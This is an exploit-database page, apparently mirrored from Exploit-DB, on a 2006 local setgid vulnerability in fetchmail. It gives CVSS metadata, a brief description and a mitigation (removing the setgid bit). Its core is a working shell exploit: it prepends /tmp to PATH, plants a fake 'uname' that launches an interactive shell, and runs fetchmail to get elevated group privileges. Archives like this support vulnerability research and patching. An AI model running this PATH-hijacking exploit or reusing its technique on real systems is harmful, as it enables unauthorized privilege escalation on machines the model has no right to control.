header-logo
Suggest Exploit
vendor:
fetchmail
by:
kf
7,2
CVSS
HIGH
Setgid vulnerability
264
CWE
Product Name: fetchmail
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unix-like systems
2006

Previously undisclosed local fetchmail issue

This exploit takes advantage of a setgid vulnerability in the fetchmail program. The attacker creates a malicious file in the /tmp directory and sets it to be executable. The attacker then runs the fetchmail program, which is setgid, and the malicious file is executed.

Mitigation:

The vulnerability can be mitigated by removing the setgid bit from the fetchmail program.
Source

Exploit-DB raw data:

#!/bin/sh
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com) 
#
# Previously undisclosed local fetchmail issue. This takes setgid=6
#
# http://docs.info.apple.com/article.html?artnum=106704

export PATH=/tmp:$PATH
echo /bin/sh -i > /tmp/uname
chmod +x /tmp/uname
/usr/bin/fetchmail -V

# milw0rm.com [2006-08-01]

Navigation

Suggest Exploit

Services By CQR